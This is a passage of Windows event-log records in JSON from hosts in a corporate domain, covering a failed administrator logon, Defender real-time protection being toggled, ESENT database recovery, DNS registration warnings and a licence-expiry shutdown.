13:08:52:869)\n","EventReceivedTime":"2021-09-21T13:08:53.425670+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:28:43.986770+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9227875636482146304","EventType":"AUDIT_FAILURE","SeverityValue":4,"Severity":"ERROR","EventID":4625,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12544,"OpcodeValue":0,"RecordNumber":878127,"ActivityID":"{63A5CF36-AEB8-0000-A6CF-A563B8AED701}","ExecutionProcessID":672,"ExecutionThreadID":5852,"Channel":"Security","Message":"An account failed to log on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Type:\t\t\t3\r\n\r\nAccount For Which Logon Failed:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\tadministrator\r\n\tAccount Domain:\t\t\r\n\r\nFailure Information:\r\n\tFailure Reason:\t\tUnknown user name or bad password.\r\n\tStatus:\t\t\t0xC000006D\r\n\tSub Status:\t\t0xC000006A\r\n\r\nProcess Information:\r\n\tCaller Process ID:\t0x0\r\n\tCaller Process Name:\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t192.168.4.204\r\n\tSource Network Address:\t172.16.20.11\r\n\tSource Port:\t\t0\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tNtLmSsp \r\n\tAuthentication Package:\tNTLM\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\r\n\r\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe Logon Type field indicates the kind of logon that was requested. 
The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe Process Information fields indicate which account and process on the system requested the logon.\r\n\r\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-0-0","TargetUserName":"administrator","Status":"0xc000006d","FailureReason":"%%2313","SubStatus":"0xc000006a","LogonType":"3","LogonProcessName":"NtLmSsp ","AuthenticationPackageName":"NTLM","WorkstationName":"192.168.4.204","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessId":"0x0","ProcessName":"-","IpAddress":"172.16.20.11","IpPort":"0","EventReceivedTime":"2021-09-21T13:28:45.915228+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T14:30:51.004190+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":6416,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":13316,"OpcodeValue":0,"RecordNumber":878583,"ExecutionProcessID":4,"ExecutionThreadID":360,"Channel":"Security","Message":"A new external device was recognized by the system.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tACC01$\r\n\tAccount Domain:\t\tPROD\r\n\tLogon ID:\t\t0x3E7\r\n\r\nDevice ID:\tDISPLAY\\Default_Monitor\\1&1f0c3c2f&0&UID256\r\n\r\nDevice Name:\tGeneric Non-PnP Monitor\r\n\r\nClass ID:\t\t{4d36e96e-e325-11ce-bfc1-08002be10318}\r\n\r\nClass Name:\tMonitor\r\n\r\nVendor IDs:\t\r\n\t\tMONITOR\\Default_Monitor\r\n\t\t\r\n\t\t\r\n\r\nCompatible IDs:\t\r\n\t\t*PNP09FF\r\n\t\t\r\n\t\t\r\n\r\nLocation Information:\t-","Category":"Plug and Play Events","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"ACC01$","SubjectDomainName":"PROD","SubjectLogonId":"0x3e7","DeviceId":"DISPLAY\\Default_Monitor\\1&1f0c3c2f&0&UID256","DeviceDescription":"Generic Non-PnP Monitor","ClassId":"{4d36e96e-e325-11ce-bfc1-08002be10318}","ClassName":"Monitor","VendorIds":"\n\t\tMONITOR\\Default_Monitor\n\t\t\n\t\t","CompatibleIds":"\n\t\t*PNP09FF\n\t\t\n\t\t","LocationInformation":"-","EventReceivedTime":"2021-09-21T14:30:52.633134+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T15:18:33.163569+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9259400833873739776","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":10010,"SourceName":"Microsoft-Windows-DistributedCOM","ProviderGuid":"{1B562E86-B7AA-4131-BADC-B6F3A001407E}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":56207,"ActivityID":"{5E3B3BE3-DA4F-4745-878E-5A31A610E9E3}","ExecutionProcessID":904,"ExecutionThreadID":2928,"Channel":"System","Domain":"ACC01","AccountName":"sa-lab-win10-02","UserID":"S-1-5-21-2550961474-1995063089-462850883-1001","AccountType":"User","Message":"The server Microsoft.SkypeApp_15.66.77.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca did not register with DCOM within the required timeout.","Opcode":"Info","param1":"Microsoft.SkypeApp_15.66.77.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca","EventReceivedTime":"2021-09-21T15:18:34.476677+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:19:02.374592+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":102,"SourceName":"ESENT","Version":0,"TaskValue":1,"OpcodeValue":0,"RecordNumber":153859,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"svchost (920,P,98) DS_Token_DB: The database engine (10.00.19042.0000) is starting a new instance (0).","Category":"General","Opcode":"Info","Data":"svchost","Data_1":"920,P,98","Data_2":"DS_Token_DB: ","Data_3":"0","Data_4":"10","Data_5":"00","Data_6":"19042","Data_7":"0000","EventReceivedTime":"2021-09-21T13:19:02.640216+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:19:03.421424+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":326,"SourceName":"ESENT","Version":0,"TaskValue":1,"OpcodeValue":0,"RecordNumber":153864,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"svchost (920,D,50) DS_Token_DB: The database engine attached a database (1, C:\\WINDOWS\\system32\\config\\systemprofile\\AppData\\Local\\DataSharing\\Storage\\DSTokenDB2.dat). (Time=0 seconds) \r\n \r\nSaved Cache: 1 0 \r\nAdditional Data: lgposAttach = 00000004:000B:0268,\ndbv = 1568.110.240 \r\n \r\nInternal Timing Sequence: \n[1] 0.000003 +J(0)\n[2] 0.000978 -0.000189 (1) WT +J(0) +M(C:0K, Fs:17, WS:4K # 0K, PF:4K # 0K, P:4K)\n[3] 0.006950 -0.001059 (6) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:7, WS:24K # 0K, PF:20K # 0K, P:20K)\n[4] 0.000626 +J(0)\n[5] -\n[6] -\n[7] -\n[8] 0.000490 -0.000323 (2) CM -0.000225 (2) WT +J(CM:2, PgRf:2, Rd:4/2, Dy:0/0, Lg:54/1) +M(C:8K, Fs:4, WS:16K # 0K, PF:28K # 0K, P:28K)\n[9] 0.005721 -0.005436 (3) CM -0.005297 (3) WT +J(CM:3, PgRf:23, Rd:0/3, Dy:0/0, Lg:0/0) +M(C:0K, Fs:24, WS:88K # 0K, PF:196K # 0K, P:196K)\n[10] 0.000507 -0.000377 (2) CM -0.000285 (2) WT +J(CM:2, PgRf:40, Rd:0/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:2, WS:8K # 0K, PF:64K # 0K, P:64K)\n[11] 0.000170 -0.000138 (1) CM -0.000095 (1) WT +J(CM:1, PgRf:1, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K)\n[12] 0.004223 -0.004147 (1) CM -0.004105 (1) WT +J(CM:1, PgRf:42, Rd:0/1, Dy:0/0, Lg:0/0)\n[13] 0.000002 +J(0)\n[14] 0.0 +J(0)\n[15] 0.000201 -0.000174 (1) CM -0.000127 (1) WT +J(CM:1, PgRf:1, Rd:0/1, Dy:0/0, Lg:0/0).","Category":"General","Opcode":"Info","Data":"svchost","Data_1":"920,D,50","Data_2":"DS_Token_DB: ","Data_3":"1","Data_4":"C:\\WINDOWS\\system32\\config\\systemprofile\\AppData\\Local\\DataSharing\\Storage\\DSTokenDB2.dat","Data_5":"0","Data_6":"\n[1] 0.000003 +J(0)\n[2] 0.000978 
-0.000189 (1) WT +J(0) +M(C:0K, Fs:17, WS:4K # 0K, PF:4K # 0K, P:4K)\n[3] 0.006950 -0.001059 (6) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:7, WS:24K # 0K, PF:20K # 0K, P:20K)\n[4] 0.000626 +J(0)\n[5] -\n[6] -\n[7] -\n[8] 0.000490 -0.000323 (2) CM -0.000225 (2) WT +J(CM:2, PgRf:2, Rd:4/2, Dy:0/0, Lg:54/1) +M(C:8K, Fs:4, WS:16K # 0K, PF:28K # 0K, P:28K)\n[9] 0.005721 -0.005436 (3) CM -0.005297 (3) WT +J(CM:3, PgRf:23, Rd:0/3, Dy:0/0, Lg:0/0) +M(C:0K, Fs:24, WS:88K # 0K, PF:196K # 0K, P:196K)\n[10] 0.000507 -0.000377 (2) CM -0.000285 (2) WT +J(CM:2, PgRf:40, Rd:0/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:2, WS:8K # 0K, PF:64K # 0K, P:64K)\n[11] 0.000170 -0.000138 (1) CM -0.000095 (1) WT +J(CM:1, PgRf:1, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K)\n[12] 0.004223 -0.004147 (1) CM -0.004105 (1) WT +J(CM:1, PgRf:42, Rd:0/1, Dy:0/0, Lg:0/0)\n[13] 0.000002 +J(0)\n[14] 0.0 +J(0)\n[15] 0.000201 -0.000174 (1) CM -0.000127 (1) WT +J(CM:1, PgRf:1, Rd:0/1, Dy:0/0, Lg:0/0).","Data_7":"1 0","Data_8":"lgposAttach = 00000004:000B:0268,\ndbv = 1568.110.240","EventReceivedTime":"2021-09-21T13:19:03.671425+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:19:03.374549+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":105,"SourceName":"ESENT","Version":0,"TaskValue":1,"OpcodeValue":0,"RecordNumber":153863,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"svchost (920,D,0) DS_Token_DB: The database engine started a new instance (0). (Time=1 seconds) \r\n \r\nAdditional Data:\r\n lgposV2[] = 00000004:0001:0000 - 00000004:0008:0367 - 00000004:0009:0000 - 00000004:0009:0000 (00000000:0000:0000)\ncReInits = 3\n \r\n \r\nInternal Timing Sequence: \n[1] 0.003158 +J(0) +M(C:0K, Fs:166, WS:652K # 0K, PF:3156K # 0K, P:3156K)\n[2] 0.000378 +J(0) +M(C:8K, Fs:96, WS:376K # 0K, PF:292K # 0K, P:292K)\n[3] 0.000018 +J(0) +M(C:0K, Fs:4, WS:16K # 0K, PF:64K # 0K, P:64K)\n[4] 0.000116 +J(0) +M(C:0K, Fs:20, WS:76K # 0K, PF:140K # 0K, P:140K)\n[5] 0.001763 +J(0) +M(C:0K, Fs:7, WS:28K # 0K, PF:16K # 0K, P:16K)\n[6] 0.750574 +J(0) +M(C:0K, Fs:19, WS:72K # 0K, PF:16K # 0K, P:16K)\n[7] 0.026396 -0.021788 (2) WT +J(0) +M(C:0K, Fs:31, WS:124K # 0K, PF:64K # 0K, P:64K)\n[8] 0.115229 -0.062606 (12) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:32448/22) +M(C:0K, Fs:455, WS:1276K # 0K, PF:1764K # 0K, P:1764K)\n[9] 0.000685 +J(0) +M(C:0K, Fs:5, WS:20K # 0K, PF:0K # 0K, P:0K)\n[10] 0.002198 -0.001414 (1) WT +J(0) +M(C:0K, Fs:0, WS:-60K # 0K, PF:-60K # 0K, P:-60K)\n[11] 0.000028 +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:49/1) +M(C:0K, Fs:2, WS:8K # 0K, PF:0K # 0K, P:0K)\n[12] 0.006304 -0.002930 (1) WT +J(0) +M(C:0K, Fs:11, WS:4K # 0K, PF:0K # 0K, P:0K)\n[13] 0.088666 -0.001456 (2) CM -0.043395 (23) WT +J(CM:2, PgRf:2, Rd:0/2, Dy:0/0, Lg:8759/5) +M(C:0K, Fs:53, WS:-712K # 0K, PF:-1304K # 0K, P:-1304K)\n[14] 0.000018 +J(0)\n[15] 0.000015 +J(0)\n[16] 0.011155 -0.010452 (1) WT +J(0) +M(C:0K, Fs:2, WS:0K # 0K, PF:0K # 0K, P:0K).","Category":"General","Opcode":"Info","Data":"svchost","Data_1":"920,D,0","Data_2":"DS_Token_DB: 
","Data_3":"0","Data_4":"1","Data_5":"\n[1] 0.003158 +J(0) +M(C:0K, Fs:166, WS:652K # 0K, PF:3156K # 0K, P:3156K)\n[2] 0.000378 +J(0) +M(C:8K, Fs:96, WS:376K # 0K, PF:292K # 0K, P:292K)\n[3] 0.000018 +J(0) +M(C:0K, Fs:4, WS:16K # 0K, PF:64K # 0K, P:64K)\n[4] 0.000116 +J(0) +M(C:0K, Fs:20, WS:76K # 0K, PF:140K # 0K, P:140K)\n[5] 0.001763 +J(0) +M(C:0K, Fs:7, WS:28K # 0K, PF:16K # 0K, P:16K)\n[6] 0.750574 +J(0) +M(C:0K, Fs:19, WS:72K # 0K, PF:16K # 0K, P:16K)\n[7] 0.026396 -0.021788 (2) WT +J(0) +M(C:0K, Fs:31, WS:124K # 0K, PF:64K # 0K, P:64K)\n[8] 0.115229 -0.062606 (12) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:32448/22) +M(C:0K, Fs:455, WS:1276K # 0K, PF:1764K # 0K, P:1764K)\n[9] 0.000685 +J(0) +M(C:0K, Fs:5, WS:20K # 0K, PF:0K # 0K, P:0K)\n[10] 0.002198 -0.001414 (1) WT +J(0) +M(C:0K, Fs:0, WS:-60K # 0K, PF:-60K # 0K, P:-60K)\n[11] 0.000028 +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:49/1) +M(C:0K, Fs:2, WS:8K # 0K, PF:0K # 0K, P:0K)\n[12] 0.006304 -0.002930 (1) WT +J(0) +M(C:0K, Fs:11, WS:4K # 0K, PF:0K # 0K, P:0K)\n[13] 0.088666 -0.001456 (2) CM -0.043395 (23) WT +J(CM:2, PgRf:2, Rd:0/2, Dy:0/0, Lg:8759/5) +M(C:0K, Fs:53, WS:-712K # 0K, PF:-1304K # 0K, P:-1304K)\n[14] 0.000018 +J(0)\n[15] 0.000015 +J(0)\n[16] 0.011155 -0.010452 (1) WT +J(0) +M(C:0K, Fs:2, WS:0K # 0K, PF:0K # 0K, P:0K).","Data_6":"lgposV2[] = 00000004:0001:0000 - 00000004:0008:0367 - 00000004:0009:0000 - 00000004:0009:0000 (00000000:0000:0000)\ncReInits = 3\n","EventReceivedTime":"2021-09-21T13:19:03.671425+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:12:01.110720+05:45","Hostname":"DC02.prod.corp.local","Keywords":"36028797018963968","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":5781,"SourceName":"NETLOGON","TaskValue":0,"RecordNumber":170129,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"Dynamic registration or deletion of one or more DNS records associated with DNS domain 'DomainDnsZones.prod.corp.local.' failed. These records are used by other computers to locate this server as a domain controller (if the specified domain is an Active Directory domain) or as an LDAP server (if the specified domain is an application partition). \r\n\r\nPossible causes of failure include: \r\n- TCP/IP properties of the network connections of this computer contain wrong IP address(es) of the preferred and alternate DNS servers \r\n- Specified preferred and alternate DNS servers are not running \r\n- DNS server(s) primary for the records to be registered is not running \r\n- Preferred or alternate DNS servers are configured with wrong root hints \r\n- Parent DNS zone contains incorrect delegation to the child zone authoritative for the DNS records that failed registration \r\n\r\nUSER ACTION \r\nFix possible misconfiguration(s) specified above and initiate registration or deletion of the DNS records by running 'nltest.exe /dsregdns' from the command prompt on the domain controller or by restarting Net Logon service on the domain controller.","Opcode":"Info","Data":"DomainDnsZones.prod.corp.local.","EventData.Binary":"2A230000","EventReceivedTime":"2021-09-21T13:12:01.986360+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:11:16.621836+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5001,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":11262,"ExecutionProcessID":2484,"ExecutionThreadID":3816,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus Real-time Protection scanning for malware and other potentially unwanted software was disabled.","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2011.6","EventReceivedTime":"2021-09-21T13:11:17.499619+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:13:01.202133+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5000,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":11264,"ExecutionProcessID":2484,"ExecutionThreadID":3816,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus Real-time Protection scanning for malware and other potentially unwanted software was enabled.","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2011.6","EventReceivedTime":"2021-09-21T13:13:01.515192+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:19:03.187093+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":300,"SourceName":"ESENT","Version":0,"TaskValue":3,"OpcodeValue":0,"RecordNumber":153860,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"svchost (920,R,98) DS_Token_DB: The database engine is initiating recovery steps.","Category":"Logging/Recovery","Opcode":"Info","Data":"svchost","Data_1":"920,R,98","Data_2":"DS_Token_DB: ","EventReceivedTime":"2021-09-21T13:19:03.671425+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:19:03.265413+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":301,"SourceName":"ESENT","Version":0,"TaskValue":3,"OpcodeValue":0,"RecordNumber":153861,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"svchost (920,R,98) DS_Token_DB: The database engine has finished replaying logfile C:\\WINDOWS\\system32\\config\\systemprofile\\AppData\\Local\\DataSharing\\Storage\\DSS.log. \r\n \r\nProcessing Stats: \n[1] 0.076911 -0.032624 (9) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:32448/22) +M(C:0K, Fs:425, WS:1164K # 0K, PF:1692K # 0K, P:1692K). \r\nLog record of type 'AttachDB ' was seen most frequently (3 times)","Category":"Logging/Recovery","Opcode":"Info","Data":"svchost","Data_1":"920,R,98","Data_2":"DS_Token_DB: ","Data_3":"C:\\WINDOWS\\system32\\config\\systemprofile\\AppData\\Local\\DataSharing\\Storage\\DSS.log","Data_4":"\n[1] 0.076911 -0.032624 (9) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:32448/22) +M(C:0K, Fs:425, WS:1164K # 0K, PF:1692K # 0K, P:1692K).","Data_5":"AttachDB ","Data_6":"3","EventReceivedTime":"2021-09-21T13:19:03.671425+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:19:03.358924+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":302,"SourceName":"ESENT","Version":0,"TaskValue":3,"OpcodeValue":0,"RecordNumber":153862,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"svchost (920,U,98) DS_Token_DB: The database engine has successfully completed recovery steps.","Category":"Logging/Recovery","Opcode":"Info","Data":"svchost","Data_1":"920,U,98","Data_2":"DS_Token_DB: ","EventReceivedTime":"2021-09-21T13:19:03.671425+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T20:52:58.277519+05:45","Hostname":"IT03.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":138,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":108983,"ExecutionProcessID":912,"ExecutionThreadID":1292,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"NtpClient succeeds in resolving domain peer DC01.corp.local after a previous failure.","Opcode":"Info","DomainPeer":"DC01.corp.local","EventReceivedTime":"2021-09-21T20:52:59.495977+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T15:30:53.665748+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":26,"SourceName":"Application Popup","ProviderGuid":"{47BFA2B7-BD54-4FAC-B70B-29021084CA8F}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":56208,"ExecutionProcessID":4284,"ExecutionThreadID":3292,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Session has been idle over its time limit.\nIt will be disconnected in 2 minutes.\nPress any key now to continue session.","Opcode":"Info","Caption":"Idle timer expired","EventReceivedTime":"2021-09-21T15:30:54.982343+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T14:03:44.090392+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9259400833873739776","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1074,"SourceName":"User32","ProviderGuid":"{B0AA8734-56F7-41CC-B2F4-DE228E98B946}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":170180,"ExecutionProcessID":384,"ExecutionThreadID":400,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The process C:\\Windows\\system32\\wlms\\wlms.exe (DC02) has initiated the shutdown of computer DC02 on behalf of user NT AUTHORITY\\SYSTEM for the following reason: Other (Planned)\r\n Reason Code: 0x80000000\r\n Shutdown Type: shutdown\r\n Comment: The license period for this installation of Windows has expired. The operating system is shutting down.\r\n","param1":"C:\\Windows\\system32\\wlms\\wlms.exe (DC02)","param2":"DC02","param3":"Other (Planned)","param4":"0x80000000","param5":"shutdown","param6":"The license period for this installation of Windows has expired. The operating system is shutting down.\n","param7":"NT AUTHORITY\\SYSTEM","EventReceivedTime":"2021-09-21T14:03:45.528530+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T14:03:44.107938+05:45","Hostname":"DC02.prod.corp.local","Keywords":"1152921504606846976","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":54,"SourceName":"Microsoft-Windows-TerminalServices-LocalSessionManager","ProviderGuid":"{5D896912-022D-40AA-A3A8-4FA5515C76D7}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":728,"ExecutionProcessID":940,"ExecutionThreadID":3116,"Channel":"Microsoft-Windows-TerminalServices-LocalSessionManager/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Local multi-user session manager received system shutdown message","Opcode":"Info","EventReceivedTime":"2021-09-21T14:03:45.566031+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:15:51.920580+05:45","Hostname":"DC01.corp.local","Keywords":"288230376151711808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":30812,"SourceName":"Microsoft-Windows-SMBClient","ProviderGuid":"{988C59C5-0A1C-45B6-A555-0C62276E327D}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":1288,"ExecutionProcessID":4,"ExecutionThreadID":88,"Channel":"Microsoft-Windows-SmbClient/Connectivity","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Added a TDI transport interface.\r\n\r\nName: \\Device\\NetBT_Tcpip_{48B8E372-14A4-40C0-9732-C046D6CCC5CD}\r\n\r\nGuidance:\r\nA TDI (NetBIOS) binding was added to the specified network adapter for the SMB client. The SMB client can now send and receive SMB traffic on this network adapter using TDI. You should expect this event when a computer restarts or when a previously disabled network adaptor is re-enabled. No user action is required.","Opcode":"Info","ServerNameLength":"58","ServerName":"\\Device\\NetBT_Tcpip_{48B8E372-14A4-40C0-9732-C046D6CCC5CD}","EventReceivedTime":"2021-09-21T14:21:57.965254+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:15:01.998735+05:45","Hostname":"DC01.corp.local","Keywords":"9223372036854775812","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":508,"SourceName":"Microsoft-Windows-Kernel-Power","ProviderGuid":"{331C3B3A-2005-44C2-AC5E-77220C37D6B4}","Version":0,"TaskValue":159,"OpcodeValue":0,"RecordNumber":645163,"ExecutionProcessID":4,"ExecutionThreadID":8,"Channel":"System","Message":"The system has been constrained to a periodic tick \r\n\r\nReason: No HW support.","Opcode":"Info","Reason":"2","EventReceivedTime":"2021-09-21T12:17:04.673707+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:16:19.889322+05:45","Hostname":"DC01.corp.local","Keywords":"288230376151711808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":30810,"SourceName":"Microsoft-Windows-SMBClient","ProviderGuid":"{988C59C5-0A1C-45B6-A555-0C62276E327D}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":1289,"ExecutionProcessID":4,"ExecutionThreadID":252,"Channel":"Microsoft-Windows-SmbClient/Connectivity","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Added a TCP/IP transport interface.\r\n\r\nName: \\DEVICE\\TCPIP6_{93214454-281b-4dbb-bf1a-2b7b93a412ab}\r\nInterfaceIndex: 0xC\r\n\r\nGuidance:\r\nA TCP/IP binding was added to the specified network adapter for the SMB client. The SMB client can now send and receive SMB traffic on this network adapter using TCP/IP. You should expect this event when a computer restarts or when a previously disabled network adaptor is re-enabled. No user action is required.","Opcode":"Info","NameLength":"53","Name":"\\DEVICE\\TCPIP6_{93214454-281b-4dbb-bf1a-2b7b93a412ab}","IfIndex":"12","EventReceivedTime":"2021-09-21T14:21:58.137122+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
